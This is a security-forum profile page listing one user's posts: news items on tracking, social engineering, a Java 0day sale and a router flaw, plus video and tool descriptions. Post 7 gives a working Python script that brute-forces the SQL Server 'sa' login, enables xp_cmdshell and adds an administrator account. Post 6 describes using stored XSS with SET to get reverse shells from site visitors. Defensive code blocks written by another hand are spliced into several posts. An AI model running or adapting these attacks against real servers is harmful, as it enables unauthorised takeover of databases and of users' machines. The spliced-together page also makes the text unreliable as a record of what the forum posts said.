Nytro
Administrators
Posts: 18725
Days Won: 706

Everything posted by Nytro

  1. Whoa, it shows me Kaspersky's SSDT hooks, I like it
  2. Forget OOP, PHP and the other crap; first of all, to pass the entrance exam you need to know C/C++ and algorithms at a decent level. After that you'll have time for other things. I'd advise you, though, to expect a lot of math shoved down your throat, even at the entrance exam. PS: At least that's how it is at the University of Bucharest.
  3. Google Tracked Web Users Bypassing iPhone Security

This is an era where innovative technologies hit the market on a regular basis. In fact, humans have become quite accustomed to the technological changes that take place so frequently. Also, people's lives have become very dependent on these modern innovative technologies. Be it the internet, mobile smartphones, or television media, people have become extremely hooked on using these devices. Along with the enormous advantages of modern communication devices and the internet, there are also some points of concern. Data breaches, security hacking, and unethical business practices carried out with the help of modern technologies have become more severe these days.

Recently, the Wall Street Journal published a story about an unethical business practice that is making waves in the mobile communication market. The journal accused major online advertising companies like Google of compromising the security settings of iPhone as well as Apple desktop users who run the Safari browser on their devices. The Wall Street Journal not only accused Google but also other major online advertising firms like Point Roll, Vibrant Media, and WPP that used specific code to trick the extremely popular web browser Safari. This allowed them to secretly monitor the behavior of iPhone users by bypassing default security settings that have been designed specifically to block such intrusions. Bypassing security settings is not the correct approach to tracking user behavior or to understanding commercial cycles. This attempt not only kept most iPhone and Safari browser users in the dark, it also called into question the overall security and privacy policies of these notable advertisers. It can also be recalled that Apple's default privacy settings definitely disallow any company from using cookies to track user behavior while using different web enabled services.

However, notable advertisers like Google and others never took any time to think twice before breaching the security for mere commercial tracking purposes. And what for? To achieve some commercial gains! It's surely a rubbish and insulting approach from these notable advertisers. They should be sued for their conduct. A strong apology from these advertisers is expected. Well, an amazing fact is that till now neither Google nor any of the other advertisers have ever offered an apology for their unprofessional behavior. Isn't it funny? This means they will carry out such activities again in the near future. They did disable the secret tracking code once the Wall Street Journal published their dirty activities, but remained unapologetic. Instead, they tried to convince people that the Wall Street Journal had misunderstood their approach completely. In a public statement, Google stated that the cookies it used were not for tracking any sort of public behavior; in fact, those cookies were not powerful enough to collect any type of personal information. The other companies involved in these security breach issues also never admitted their guilt. Many of these advertisers said that they were totally unaware of any such security breach or of any illegal activities. There are many tech and web companies that offer free products and then earn through online advertising. But also remember that these companies often try to act too smartly while crossing the privacy line of clients to learn about customer behavior. All for commercial gains, and such an approach may not help in creating a positive reputation for that particular company. Breaching security is a serious offense and can result in legal action.

About the author: Margaret is a blogger by profession. She loves writing, reading and travelling. She is an avid golfer and answers how much to ship golf clubs by suggesting Shipsticks golf.

Source: Google Tracked Web Users Bypassing iPhone Security | Ethical Hacking-Your Way To The World Of IT Security
  4. Facebook Graph Search may be a social engineering nightmare
Facebook's new search engine serves up the kind of data that cyber scammers love
By Ted Samson | InfoWorld

Facebook's newly unveiled Graph Search search engine is an intriguing marriage of social networking and big data, creating opportunities for people to easily connect with prospective business partners, customers, friends, dates, and so on. At the same time, it's tough to ignore that Graph Search could be used as an on-tap source of social engineering data, which cyber scammers and malicious hackers could use and abuse in any number of ways.

If you missed Facebook's big announcement about Graph Search, it's basically a Facebook search engine with which you can track down Facebook users who meet particular criteria (say, people who live in Chicago and are software developers). You can also search for pictures or businesses that meet particular criteria (such as "pictures of my friends at Disneyland" or "attorneys that my friends recommend.")

Social engineering entails using personal details about a victim (where they work, where they went to school, who they're married to, what their interests are) to gain trust so that you can scam them, hack them, or otherwise take advantage. Hacking competitions in recent years have added social engineering events as the tactic has gained in popularity. Graph Search appears to be well suited for serving up the very data that a scammer might use to dupe a target. Though Graph Search is not yet available to users, Facebook is offering a glimpse of what its search might yield. Based simply on the outcome of a sample search, I could see how the tool could be used to quickly gather enough personal data about fellow Facebook users to successfully launch social-engineering-style attacks.

For my sample search, I logged in with a bogus Facebook account I created long ago when I was interested in playing admittedly insipid Facebook games -- the ones that require you to have as many Facebook friends as possible in order to advance. I have around 445 friends on this account; I know there are other Facebook game-players with more -- as well as an underground market for such accounts. I clicked the sample Graph Search search button, and it looked up "people who live in my city." In this case, the city was New York, New York, per my account settings. The search results included a list of 12 people, none of whom I know in real life. As far as I can tell, they are all either Facebook friends or friends of friends. To me, they're all strangers on the Internet.

Accompanying the dozen search results are the users' names and a profile picture, along with such data as where they live, how old they are, where they work or attend school, whether they are in a relationship, what sort of music they like, what interests they have, and the Facebook friends we have in common. All of that data could be used for social-engineering-style chicanery. Bear in mind, too, that this is a sample search, and I didn't even get to choose the criteria. As Facebook describes Graph Search, you'll be able to perform far more granular searches (searches for pictures with select people or searches for businesses your friends recommend), which can be useful but can also be wielded for potentially more pointed attacks. Facebook has stressed that the data that shows up in Graph Search searches is data users have chosen to make public. But keep in mind: A lot of clueless, ignorant, and/or overly trusting users out there don't necessarily know how to protect themselves online, not even in a sandbox like Facebook where security controls aren't that hard to find.

Here's what Facebook had to say about Graph Search and privacy:

When you share something on Facebook, you get to decide exactly who can see that content. This, of course, is why Graph Search is such a powerful experience: A lot of what you will find is content that is not public, but content that someone has shared with a limited audience that happens to include you.... One challenge in particular is worth calling out. Consider the relatively simple Graph Search query, "Photos of Facebook employees." For starters, we make sure that only photos that the owner has shared with the person conducting the search can be seen on the photo results page. But we also have to make sure that each photo features at least one person who has shared with the searcher that they work at Facebook! Otherwise we would implicitly be revealing content that the searcher does not have access to.

Although it's nice to know that Facebook is aware of the security challenge, one has to wonder whether the company will be able to maintain a handle on keeping private data private with so much data and so many "privacy checks" running in the background. Graph Search is slated for release this summer, with beta testing opening up to select users in the interim. Time will tell whether privacy and security concerns are warranted.

This story, "Facebook Graph Search may be a social engineering nightmare," was originally published at InfoWorld.com. Get the first word on what the important tech news really means with the InfoWorld Tech Watch blog. For the latest developments in business technology news, follow InfoWorld.com on Twitter.

Source: Facebook Graph Search may be a social engineering nightmare | Internet privacy - InfoWorld
  5. Better to edit /etc/hosts with the .geek domains, it's simpler. That way we could make .rst domains too.
  6. Stored XSS And SET

Stored XSS is the most dangerous type of cross site scripting, because the user can be exploited just by visiting the web page where the vulnerability occurs. Also, if that user happens to be the administrator of the website, this can lead to compromise of the web application, which is one of the reasons the risk is higher than for a reflected XSS. In real world scenarios, once a stored XSS vulnerability has been discovered, the penetration tester reports the issue and provides a brief explanation of the potential risks in the final report, but he doesn't continue the attack, as it is not necessary unless the client asks for it. However, a malicious attacker will not stop there and will try to attack the users by combining tools and methods. So in this article we will examine how an attacker can use SET with a stored XSS in order to obtain shells from users.

First of all, stored XSS can be discovered in web applications that allow users to store information, like comments, message boards, page profiles, shopping carts etc. Let's say that we have a web application with the following form:

(Image: Comment Form Vulnerable to XSS)

In order to test it for XSS we will try to pass the following script into the comment field:

(Image: Alert Box – JavaScript Code)

The result will be the following:

(Image: Comment Field Vulnerable to XSS)

Now that we know where the vulnerability exists we can launch the Social Engineering Toolkit.

(Image: SET – Menu)

The attack that we are going to choose is the Java Applet Attack Method.

(Image: Java Applet Attack Method)

We will enter our IP address so that the reverse shell connects back to us, and we will choose the first option, which is Java Required.

(Image: SET Configurations)

Next we will have to choose our payload and our encoder. In this case we will select a simple Meterpreter Reverse TCP as the payload and the famous shikata_ga_nai as the encoder.

(Image: SET – Encoders)

Now we can go back to the web application and try to insert the malicious JavaScript code in the comment field that we already know is vulnerable to XSS.

(Image: Malicious JavaScript Code)

When a user tries to access the page that contains the malicious JavaScript, the code will be executed in his browser and a new window will come up containing the following message:

(Image: Fake message trying to convince the user to run the Java applet)

After a while the user will notice a pop-up box asking him if he wants to run the Java applet.

(Image: Malicious Java Applet)

If the user presses the Run button the malicious code will be executed and it will return us a shell.

(Image: Remote Shell)

Conclusion

As we saw, stored XSS can be very dangerous, as the JavaScript code is executed once the unsuspecting user has visited the vulnerable page. In this article the malicious attacker wanted to redirect the user to another page in order to run the malicious Java applet that led to a shell. A potential attacker can use many tools with different arbitrary code combined together in order to achieve his goal, so regular penetration tests are a necessity for every company that wants to defend itself from non-ethical hackers.

Source: Stored XSS And SET
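The root cause the article exploits is a comment rendered into the page without output encoding. As an added example (this is not code from the article, from SET, or from the demonstrated web application), the following Python shows the defective render beside the hardened one and the headers that limit the damage if an encoding is missed; the sample comments, the wrapper markup and the CSP values are constructed assumptions.

```python
import html

# Constructed sample comments; the article does not print the exact script it
# submitted, so these stand in for what a comment form might receive.
SAMPLE_COMMENTS = [
    "Nice post!",
    "<script>alert('stored xss')</script>",
    '<img src=x onerror="alert(1)">',
    'Tom & Jerry say "hi" <3',
]

WRAP_OPEN, WRAP_CLOSE = '<div class="comment">', '</div>'


def render_vulnerable(comment: str) -> str:
    """The defect the article exploits: the stored comment is copied into the
    page verbatim, so any markup the author submitted becomes live HTML for
    every later visitor."""
    return WRAP_OPEN + comment + WRAP_CLOSE


def render_hardened(comment: str) -> str:
    """Fix: encode at the output boundary. html.escape turns & < > " ' into
    entities, so the browser shows the comment as text and never parses it
    as a tag, attribute or script."""
    return WRAP_OPEN + html.escape(comment, quote=True) + WRAP_CLOSE


def body_starts_a_tag(fragment: str) -> bool:
    """Check used in the examples: does the rendered comment body still contain
    a raw '<' that the browser would read as the start of a tag?"""
    body = fragment[len(WRAP_OPEN):-len(WRAP_CLOSE)]
    return "<" in body


def security_headers() -> dict:
    """Defence in depth for the case an encoding is missed somewhere. Values are
    illustrative (assumption): script-src without 'unsafe-inline' blocks injected
    inline <script> and event handlers, and object-src 'none' blocks plugin
    content such as the Java applet the article's SET payload relies on."""
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "object-src 'none'; base-uri 'none'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        print("vulnerable:", render_vulnerable(c))
        print("hardened:  ", render_hardened(c))
```

Encoding belongs at the point of output, not at the point of storage: the same comment may later be emitted into HTML text, an attribute, or JSON, and each context needs its own encoder. The CSP `object-src 'none'` directive matters specifically for the applet-based payload described above, since it stops the browser from instantiating plugin content even if a redirect or injected markup reaches the page.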
  7. SQL Brute Force Script

The purpose of this script is to perform a brute force attack on an SQL database. The script will try to connect to the remote host with the administrative account sa and with each password from the file pass.txt. If a connection is successful, it will try to enable xp_cmdshell and add a new user on the remote host.

Author: Larry Spohn
Website: http://e-spohn.com
Twitter: @Spoonman1091
Credits: Dave Kennedy

```python
#!/usr/bin/python
# Requires the pymssql package, which provides the low-level _mssql module.
import _mssql

# mssql = _mssql.connect('ip', 'username', 'password')
# mssql.execute_query()

ip = "192.168.200.128"

with open("pass.txt", "r") as passwords:
    for password in passwords:
        password = password.rstrip()
        try:
            mssql = _mssql.connect(ip, "sa", password)
        except (_mssql.MSSQLDatabaseException, _mssql.MSSQLDriverException):
            # Login rejected (or connection error): move on to the next candidate
            print("[!] Failed login for username 'sa' and password: " + password)
            continue
        print(" [*] Successful login with username 'sa' and password: " + password)
        print(" [*] Enabling 'xp_cmdshell'")
        mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;")
        mssql.execute_query("RECONFIGURE;")
        print(" [*] Adding Administrative user")
        mssql.execute_query("xp_cmdshell 'net user netbiosX Password! /ADD && net localgroup administrators netbiosX /ADD'")
        mssql.close()
        print(" [*] Success!")
        break
```

Source: SQL Brute Force Script
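Every step the script above takes leaves a trace in the SQL Server ERRORLOG: a burst of "Login failed for user 'sa'" lines from one client, a success from the same client, and the "Configuration option 'xp_cmdshell' changed from 0 to 1" message when the post-login step runs. As an added example (not part of the original post or of the script), here is a small Python detector over such lines. The log excerpt is constructed; its line layout and message texts follow the real ERRORLOG format, but timestamps, addresses and the burst itself are invented. It assumes the instance's login auditing is set to record both failed and successful logins, otherwise the success line is absent and only the first and third alerts fire.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed SQL Server ERRORLOG excerpt (real line format, invented values).
SAMPLE_ERRORLOG = """\
2013-01-16 10:02:11.23 Logon       Error: 18456, Severity: 14, State: 8.
2013-01-16 10:02:11.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.1]
2013-01-16 10:02:11.41 Logon       Error: 18456, Severity: 14, State: 8.
2013-01-16 10:02:11.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.1]
2013-01-16 10:02:11.58 Logon       Error: 18456, Severity: 14, State: 8.
2013-01-16 10:02:11.58 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.1]
2013-01-16 10:02:11.77 Logon       Error: 18456, Severity: 14, State: 8.
2013-01-16 10:02:11.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.1]
2013-01-16 10:02:11.93 Logon       Error: 18456, Severity: 14, State: 8.
2013-01-16 10:02:11.93 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.200.1]
2013-01-16 10:02:12.10 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.200.1]
2013-01-16 10:45:00.00 Logon       Error: 18456, Severity: 14, State: 8.
2013-01-16 10:45:00.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
2013-01-16 10:45:30.00 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<src>\S+)\s+(?P<msg>.*)$")
FAIL_RE = re.compile(r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
OK_RE = re.compile(r"Login succeeded for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]")
XPCMD_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")


def parse_errorlog(text):
    """Turn ERRORLOG lines into (timestamp, kind, user, client) events. The
    'Error: 18456' companion lines carry no user or client and are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        msg = m["msg"]
        fail, ok = FAIL_RE.search(msg), OK_RE.search(msg)
        if fail:
            events.append((ts, "fail", fail["user"], fail["client"]))
        elif ok:
            events.append((ts, "ok", ok["user"], ok["client"]))
        elif XPCMD_RE.search(msg):
            events.append((ts, "xp_cmdshell_enabled", None, None))
    return events


def detect(text, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window detector. Alerts, in order of occurrence:
    ('bruteforce', user, client)          threshold failures inside the window
    ('bruteforce_success', user, client)  a success from a pair already flagged
    ('xp_cmdshell_enabled', None, None)   the post-login step the script takes"""
    alerts, flagged = [], set()
    recent = defaultdict(deque)  # (client, user) -> failure timestamps in window
    for ts, kind, user, client in parse_errorlog(text):
        key = (client, user)
        if kind == "fail":
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("bruteforce", user, client))
        elif kind == "ok" and key in flagged:
            alerts.append(("bruteforce_success", user, client))
        elif kind == "xp_cmdshell_enabled":
            alerts.append((kind, None, None))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_ERRORLOG):
        print(alert)
```

The single failed login for appuser stays below the threshold and is not reported, while the xp_cmdshell change is reported on its own regardless of any login pattern, since enabling it is rare on a production instance and is the pivot the script relies on.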
  8. Dll Hijack Auditor is a smart tool to audit any Windows application against the DLL hijacking vulnerability. This is one of the critical security issues affecting almost all Windows systems. Though most apps have been fixed, many Windows applications are still susceptible to this vulnerability, which can allow an attacker to completely take over the system.

DllHijackAuditor helps in discovering all such vulnerable DLLs in a Windows application, which otherwise can lead to successful exploitation resulting in total compromise of the system. With its simple GUI interface, DllHijackAuditor makes it easy for anyone to instantly perform the auditing operation. It also presents a detailed technical audit report which can help the developer in fixing all vulnerable points in the application.

DllHijackAuditor is a standalone portable application which also comes with an installer for local installation & uninstallation of the software. It works on a wide range of platforms, starting from Windows XP to the latest operating system, Windows 8.

Features

Here are some of the smart features of DllHijackAuditor:
  • Directly & instantly audit any Windows application.
  • Allows complete testing to uncover all vulnerable points in the target application.
  • Smart debugger-based 'Interception Engine' for consistent and efficient performance without intrusion.
  • Support for specifying as well as auditing applications with custom & multiple extensions.
  • Timeout configuration to alter the waiting time for each application.
  • Generates a complete auditing report (in HTML format) about all vulnerable hijack points in the application.
  • GUI based tool, makes it easy for anyone with minimum knowledge to perform the auditing operation.
  • Does not require any special privilege for auditing of the application (unless the target application requires it).
  • Free from antivirus interference, as it does not use any shellcode or exploit code which would trigger antivirus to terminate the operation.
  • Fully portable tool which can be run directly on any system.
  • Support for local installation and uninstallation of the software.

Download: http://securityxploded.com/dllhijackauditor.php
  9. Another Java exploit is on sale for $5,000
Criminals hit Java again just 24 hours after patch
By Alastair Stevenson
Wed Jan 16 2013, 16:55

ANOTHER EXPLOIT aimed at Oracle's Java software has appeared just days after the company rushed out a patch to fix a previous vulnerability. The exploit was detected on Wednesday by Krebsonsecurity and reportedly takes advantage of another zero day vulnerability in Java.

"On Monday, an administrator of an exclusive cybercrime forum posted a message saying he was selling a new Java 0day to a lucky two buyers. The cost: starting at $5,000 each," wrote Brian Krebs. "The hacker forum admin's message promised weaponized and source code versions of the exploit. This seller also said his Java 0day - in the latest version of Java (Java 7 Update 11) - was not yet part of any exploit kits, including the Cool Exploit Kit."

If accurate, then the zero day vulnerability will be the second discovered this year. The first vulnerability was discovered after researchers spotted a ransomware Trojan known as Reveton targeting the flaw. Unlike the alleged new attack, the original vulnerability was linked with the popular Blackhole and Cool exploit kits. The kits are infamous toolkits traded on the black market that enable cybercriminals to mount automated attacks.

The first attack led to widespread calls within the security industry for internet users to turn Java off. The warnings reached near panic levels when the US Computer Emergency Response Team (CERT) again recommended that internet users shut the software down mere days after Oracle released its security update. Despite the security fears, some companies have noted that simply turning Java off might not be an option for large businesses. Krebs was quick to reiterate this sentiment, noting that Java web apps were never designed for use in consumer transactions.

"Much of the advice on how to lock down Java on consumer PCs simply doesn't scale in the enterprise, and vice-versa," wrote Krebs. "Oracle's unprecedented four-day turnaround on a patch for the last zero-day flaw notwithstanding, the company lacks any kind of outward sign of awareness that its software is so broadly installed on consumer systems. "Oracle seems to be sending a message that it doesn't want hundreds of millions of consumer users; those users should listen and respond accordingly."

At the time of publishing Oracle had not responded to a request from The INQUIRER for comment on the reported new Java vulnerability.

Source: Another Java exploit is on sale for $5,000- The Inquirer
  10. DefenseCode Warns of Linksys Router Security Flaw
The researchers say they told Cisco about the vulnerability, but were informed it was already fixed. It wasn't.
By Jeff Goldman | January 16, 2013

DefenseCode researchers recently uncovered a zero day vulnerability in Linksys routers. "Cisco Linksys is a very popular router with more than 70,000,000 routers sold," the researchers wrote. "That's why we think that this vulnerability deserves attention."

"DefenseCode said the flaw is in the default installation of Linksys routers, which are primarily used in home networks," writes CSO Online's Antone Gonsalves. "The company showing a proof-of-concept exploit being used to gain root access to a Linksys model WRT54GL router."

"They contacted Cisco and shared a detailed vulnerability description along with the PoC exploit for the vulnerability," writes Help Net Security's Mirko Zorz. "Cisco claimed that the vulnerability was already fixed in the latest firmware release, which turned out [to] be incorrect."

"The vulnerability affects all versions of Linksys firmware up to and including the current version, 4.30.14," notes The Register's Richard Chirgwin. "DefenseCode intends to release a full description of the vulnerability within two weeks."

"A patch is due out this week, days ahead of DefenseCode's scheduled release of the full vulnerability details," notes SC Magazine's Darren Pauli.

Source: DefenseCode Warns of Linksys Router Security Flaw - eSecurity Planet
  11. Wireless Beacon Fuzzing Using Metasploit

Description: In this video I will show you how to perform fuzzing on wireless networks using the Metasploit Framework. For this attack, use BackTrack 5 R2 and install Lorcon 2. After launching the attack, this module will start fuzzing the AP and other devices, and the AP will not send any more requests to others. If you start monitoring the air you can see there are lots of corrupted fake access points, since this module sends out corrupted beacon frames.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Wireless Beacon Fuzzing Using Metasploit
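The "corrupted fake access points" a monitor sees during this kind of fuzzing are beacon frames whose body no longer follows the fixed-fields-then-information-elements layout. As an added example (not code from the video, from Metasploit or from Lorcon), here is a Python parser for a beacon body that records every structural violation instead of crashing, which is what a wireless IDS needs in order to count and attribute malformed beacons. The frame bodies are constructed test data, and the capability bits used in the builder are an illustrative assumption.

```python
import struct

SSID_ID, RATES_ID, DS_PARAM_ID = 0, 1, 3
FIXED_LEN = 8 + 2 + 2  # timestamp, beacon interval, capability information


def parse_beacon_body(body: bytes) -> dict:
    """Parse a beacon's management-frame body (everything after the 802.11 MAC
    header): three fixed fields, then a run of (element id, length, data)
    information elements. Every departure from that structure is recorded in
    'anomalies' instead of raising, so a monitor can keep consuming frames."""
    anomalies = []
    if len(body) < FIXED_LEN:
        return {"anomalies": ["body shorter than fixed fields"], "elements": []}
    timestamp, interval, capability = struct.unpack_from("<QHH", body, 0)
    if interval == 0:
        anomalies.append("beacon interval of 0")
    elements, seen_ssid, off = [], False, FIXED_LEN
    while off < len(body):
        if off + 2 > len(body):
            anomalies.append(f"dangling byte at offset {off}")
            break
        eid, elen = body[off], body[off + 1]
        data = body[off + 2:off + 2 + elen]
        if len(data) < elen:  # declared length runs past the end of the frame
            anomalies.append(f"element {eid} declares {elen} bytes but only {len(data)} remain")
            elements.append((eid, data))
            break
        if eid == SSID_ID:
            if seen_ssid:
                anomalies.append("duplicate SSID element")
            seen_ssid = True
            if elen > 32:
                anomalies.append(f"SSID length {elen} exceeds 32")
        elif eid == RATES_ID and not 1 <= elen <= 8:
            anomalies.append(f"supported rates length {elen} outside 1..8")
        elif eid == DS_PARAM_ID and elen != 1:
            anomalies.append(f"DS parameter set length {elen}, expected 1")
        elements.append((eid, data))
        off += 2 + elen
    if not seen_ssid:
        anomalies.append("no SSID element")
    return {"timestamp": timestamp, "interval": interval, "capability": capability,
            "elements": elements, "anomalies": anomalies}


def build_beacon_body(ssid: bytes, channel: int, interval: int = 100,
                      rates: bytes = b"\x82\x84\x8b\x96") -> bytes:
    """Construct a body for the samples below (constructed test data, not a
    captured frame). Capability 0x0401 = ESS + short slot time (assumption)."""
    fixed = struct.pack("<QHH", 0, interval, 0x0401)
    return (fixed + bytes([SSID_ID, len(ssid)]) + ssid
            + bytes([RATES_ID, len(rates)]) + rates
            + bytes([DS_PARAM_ID, 1, channel]))


# Constructed samples: one well-formed body and three of the malformed kind a
# beacon fuzzer emits.
GOOD = build_beacon_body(b"LabNet", 6)
TRUNCATED = GOOD[:-1]                              # DS element cut short
OVERSIZED_SSID = build_beacon_body(b"A" * 40, 6)   # SSID longer than 32 bytes
ZERO_INTERVAL = build_beacon_body(b"LabNet", 6, interval=0)

if __name__ == "__main__":
    for name, body in [("good", GOOD), ("truncated", TRUNCATED),
                       ("oversized ssid", OVERSIZED_SSID), ("zero interval", ZERO_INTERVAL)]:
        print(name, parse_beacon_body(body)["anomalies"])
```

The point of returning anomalies rather than raising is that a fuzzed channel produces thousands of such frames; a monitor that aborts on the first bad length loses the count, the source addresses and the timing that tell an operator whether a real AP is misbehaving or a fuzzer is running nearby.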
  12. Security Evaluation Of Russian Gost Cipher

Description: In this talk we will survey some 30 recent attacks on the Russian GOST block cipher.

Background: GOST cipher is the official encryption standard of the Russian Federation, and also has special versions for the most important Russian banks. Until 2012 there was no attack on GOST when it is used in encryption with random keys. I have developed more than 30 different academic attacks on GOST; the fastest has complexity of 2^118 to recover some but not all 256-bit keys generated at random, which will be presented for the first time at the CCC conference. It happens only once per decade that a government standard is broken while it is still an official government standard (it happened for DES and AES; no other cases known). All these are broken only in the academic sense; for GOST the most recent attacks are sliding into maybe arguably practical in 30 years from now instead of 200 years... Our earlier results were instrumental at ISO for rejecting GOST as an international encryption standard last year. Not more than 5+ block ciphers have ever achieved this level of ISO standardisation in 25 years, and it NEVER happened in the history of ISO that a cipher got broken during the standardization process. The two main papers, with 70 and 30 pages respectively, are Cryptology ePrint Archive: Report 2011/626 and Cryptology ePrint Archive: Report 2012/138. Two other papers have already been published in the Cryptologia journal, which specializes in serious military and government crypto.

The talk will cover three main families of attacks on GOST: high-level transformations, low-level inversion/MITM/guess-then-software/algebraic attacks and advanced truncated differential cryptanalysis of GOST.

Plan for the talk: First I cover the history of GOST with major Cold War history events as the necessary background. Then I describe in detail three main families of attacks:
1) self-similarity attacks, which generalize slide, fixed point and reflection attacks, and provide a large variety of ways in which the security of the full GOST cipher with 32 rounds can be reduced to the security of GOST with 8 rounds in a black box reduction, so that the task of the cryptanalyst is split into two well-defined tasks.
2) detailed software/algebraic and MITM attacks on 8 rounds, and how weak diffusion in GOST helps.
3) advanced truncated differential attacks on GOST.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Security Evaluation Of Russian Gost Cipher
  13. Brute Force Attack On Truecrypt

Description: In this video I will show you how to perform a brute-force attack on an encrypted TrueCrypt file or drive. You need one tool called tc-guessus and one wordlist. This tool is very simple and easy to use; if your password is in the word list, you can crack the file easily.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Brute Force Attack On Truecrypt
  14. Ethics In Security Research

Description: Recently, several research papers in the area of computer security were published that may or may not be considered unethical. Looking at these borderline cases is relevant, as today's research papers will influence how young researchers conduct their research. In our talk we address various cases and papers and highlight emerging issues for ethics committees, internal review boards (IRBs) and senior researchers to evaluate research proposals and to finally decide where they see a line that should not be crossed.

For researchers in computer security the recent success of papers such as [KKL+09] is an incentive to follow along a line of research where ethical questions become an issue. In our talk at the conference we will address various cases and papers and provide possible guidelines for ethics committees, internal review boards (IRBs) and senior researchers to evaluate research proposals and to finally decide where they see a line that should not be crossed. While some actions might not be illegal, they still may seem unethical. Key phrases that would be addressed in the discussion: (1) Do not harm users actively, (2) Watching bad things happening, (3) Control groups, (4) Undercover work.

In the following, we introduce some lines of thought that should be discussed throughout the talk:

A first and seemingly straightforward principle is that researchers should not actively harm others. So deploying malware or writing and deploying new viruses is obviously a bad idea. Is it, however, ok to modify malware? Following the arguments of [KKL+08], one would not create more harm if, for instance, one instrumentalized a virus so that it sends us statistical data about its host. Such a modification could be made by the ISP or the network administrators at a university network. If this modification makes the virus less likely to be detected by anti-virus software, the case, however, changes. Then this is analogous to distributing a new virus. A few quick lab experiments have shown that malware that is detected by virus scanners is very often not picked up after it has been modified. Stealing a user's computing and networking resources may harm her; however, if some other malware already steals the resources, one could argue that the damage is less, since the researcher's software does "less bad things". This is basically what the authors of [KKL+08] argue. So when taking over a botnet, generating additional traffic would not be permissible, whereas changing traffic would be. The real-world analogue is that you see someone breaking into a house, you scare the person away and then you go in and only look around, for instance, to understand how the burglar selected the target and what he was planning to steal, which is "less bad" than stealing what the burglar was probably planning to do.

There is a line of research where researchers only passively observe malware and phishing without modifying any content or receivers. When thinking of the research ethics of "watching what happens", the Tuskegee Study of Syphilis [W1] comes to mind. Patients were not informed about available treatments, no precautions were taken so that patients did not infect others, and they were also actively given false information regarding treatment. Today it is obvious that the study is unethical. As done in [bSBK09], the best way is to ask people for their consent prior to the experiment. In other studies, involving, for instance, botnets, this procedure may be impossible, as a host computer can only be contacted after sending modified messages. In a botnet study such as [sGCC+09] it seems both feasible and responsible to inform a user that her computer is part of a botnet. However obvious this may seem, there might be multiple users on an infected machine, and informing an arbitrary user could cause some additional harm. For instance, the infection of an office computer may have been caused by deactivating the anti-virus software, surfing to Web pages not related to work, etc. Thus informing one person could cause another person to lose his job. While this is not as extreme as the "Craigslist experiment" [W2], similar impacts are conceivable.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: Ethics In Security Research
  15. How I Met Your Pointer

Description: An approach to the problem of fuzzing proprietary protocols will be shown, focusing on network protocols and native software. In the course of this talk I will combine several methods in order to force the client software to work as a "double agent" against the server.

An interesting approach to the problem of fuzzing proprietary protocols will be presented. Since the method is applicable to several kinds of software, and in order to keep an example in mind throughout the talk, I will be focusing on network protocols and native software. The main idea behind it is very simple: "in a client/server architecture, the client knows how the protocol works." In the course of this talk I will need to combine several methodologies in order to "force" the client software to work as a "double agent" against the server. Advanced hooking, dynamic binary instrumentation and differential debugging are among the topics discussed here. The talk includes a live demo of this method in which a small program implementing a proprietary protocol will be fuzzed (without knowledge of it) and a memory corruption will be found. Last but not least, the talk is written in a very amusing style, with multiple references to "nerd culture" and interaction with the audience, to make the (hard) topic as interesting and entertaining as it can be.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:
Source: How I Met Your Pointer
